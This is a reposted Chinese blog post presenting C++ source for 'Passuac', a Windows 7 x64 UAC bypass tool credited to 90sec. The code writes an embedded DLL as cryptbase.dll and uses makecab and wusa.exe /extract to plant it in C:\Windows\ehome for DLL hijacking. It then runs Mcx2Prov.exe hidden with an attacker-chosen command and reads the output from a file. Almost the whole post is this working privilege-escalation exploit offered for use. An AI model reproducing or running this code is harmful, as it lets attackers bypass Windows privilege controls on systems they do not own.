标签:
// Passuac.cpp : Defines the entry point for the console application. // #include "stdafx.h" #include <Windows.h> #include <stdio.h> #include <direct.h> BOOL IsUserInAdminGroup() //判断是否在管理员组 { BOOL fInAdminGroup = FALSE; HANDLE hToken = NULL; HANDLE hTokenToCheck = NULL; DWORD cbSize = 0; OSVERSIONINFO osver = {0}; osver.dwOSVersionInfoSize = sizeof(osver); if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_DUPLICATE, &hToken)) goto Cleanup; if (!GetVersionEx(&osver)) goto Cleanup; if (osver.dwMajorVersion >= 6) { TOKEN_ELEVATION_TYPE elevType; if (!GetTokenInformation(hToken, TokenElevationType, &elevType, sizeof(elevType), &cbSize)) goto Cleanup; if (TokenElevationTypeLimited == elevType) { if (!GetTokenInformation(hToken, TokenLinkedToken, &hTokenToCheck, sizeof(hTokenToCheck), &cbSize)) goto Cleanup; } } if (!hTokenToCheck) { if (!DuplicateToken(hToken, SecurityIdentification, &hTokenToCheck)) goto Cleanup; } BYTE adminSID[SECURITY_MAX_SID_SIZE]; cbSize = sizeof(adminSID); if (!CreateWellKnownSid(WinBuiltinAdministratorsSid, NULL, &adminSID, &cbSize)) goto Cleanup; if (!CheckTokenMembership(hTokenToCheck, &adminSID, &fInAdminGroup)) goto Cleanup; Cleanup: if (hToken) CloseHandle(hToken); if (hTokenToCheck) CloseHandle(hTokenToCheck); return fInAdminGroup; } BOOL IsRunAsAdmin() //判断是否以管理员权限运行 { BOOL fIsRunAsAdmin = FALSE; DWORD dwError = ERROR_SUCCESS; PSID pAdministratorsGroup = NULL; SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY; if (!AllocateAndInitializeSid( &NtAuthority, 2, SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS, 0, 0, 0, 0, 0, 0, &pAdministratorsGroup)) { dwError = GetLastError(); goto Cleanup; } if (!CheckTokenMembership(NULL, pAdministratorsGroup, &fIsRunAsAdmin)) { dwError = GetLastError(); goto Cleanup; } Cleanup: if (pAdministratorsGroup) FreeSid(pAdministratorsGroup); return fIsRunAsAdmin; } BOOL writedll64() { char Szpath[MAX_PATH] = {0}; char uacexqute[1024] = {0}; DWORD dwWrite=0; WORD wResID; HANDLE hFile = CreateFileA("cryptbase.dll",GENERIC_WRITE,FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL); if (hFile == INVALID_HANDLE_VALUE) { printf("Getlasterror:%d.\r\n",GetLastError()); return 0; } HRSRC hrsc = FindResource(NULL,MAKEINTRESOURCE(IDR_TESTDLL1),L"TESTDLL"); HGLOBAL hG = LoadResource(NULL, hrsc); DWORD dwSize = SizeofResource( NULL, hrsc); WriteFile(hFile,hG,dwSize,&dwWrite,NULL); CloseHandle( hFile ); getcwd(Szpath, MAX_PATH); strcat(Szpath,"\\cryptbase.tmp"); system("makecab cryptbase.dll cryptbase.tmp"); sprintf(uacexqute,"%s /extract:C:\\Windows\\ehome\\",Szpath); ShellExecuteA(NULL, "open", "wusa.exe", uacexqute, NULL, SW_HIDE); //remove("cryptbase*"); DeleteFileA("cryptbase.dll"); DeleteFileA("cryptbase.tmp"); return true; } int main(int argc,char* argv[]) { FILE* fp; char szcmd[1024] = {0}; char *Options; char buffer[2048] = {0}; STARTUPINFO si={sizeof(si)}; PROCESS_INFORMATION pi; si.dwFlags=STARTF_USESHOWWINDOW; si.wShowWindow=TRUE; if (argc < 2) { printf("[*]:%s Passuac for windows 7 x64\n",argv[0]); printf("[*]:%s Setp1: passuac\r\n",argv[0]); printf("[*]:%s Setp2: shell_cmd\r\n",argv[0]); printf("[*]:Welcome to www.90sec.org\r\n"); printf("[*]:Pass uac t00ls By:@90sec\r\n\r\n"); return 0; } strcpy(szcmd,argv[1]); char szNewCmd[MAX_PATH] = {0}; wsprintfA(szNewCmd, "\"%s\"", szcmd); if (!IsUserInAdminGroup()) { printf("Your not have in Local Administrator Group\r\n"); printf("Program exit;"); exit(1); }else { printf("Your have in Local Administrator Group\r\n"); printf("PassUac ing.....\r\n"); if (!IsRunAsAdmin()) { if (!strcmp(szcmd,"passuac")) { writedll64(); }else { ShellExecuteA(NULL, "open", "C:\\windows\\ehome\\Mcx2Prov.exe", szNewCmd, NULL, SW_HIDE); Sleep(4000); fp = fopen("c:\\programdata\\uac.txt","rb"); if (fp == NULL) { printf("Getlasterror:%d\r\n",GetLastError()); return 0; } ZeroMemory(buffer,sizeof(buffer)); while (fgets(buffer,sizeof(buffer),fp)) { printf(buffer); } fclose(fp); } } } return 0; }
需要自己写个DLL,来进行参数解析。请看代码把。
代码写的相当烂,但是能够达到地步,还请各位莫笑话。
标签:
原文地址:http://www.cnblogs.com/killbit/p/4787657.html
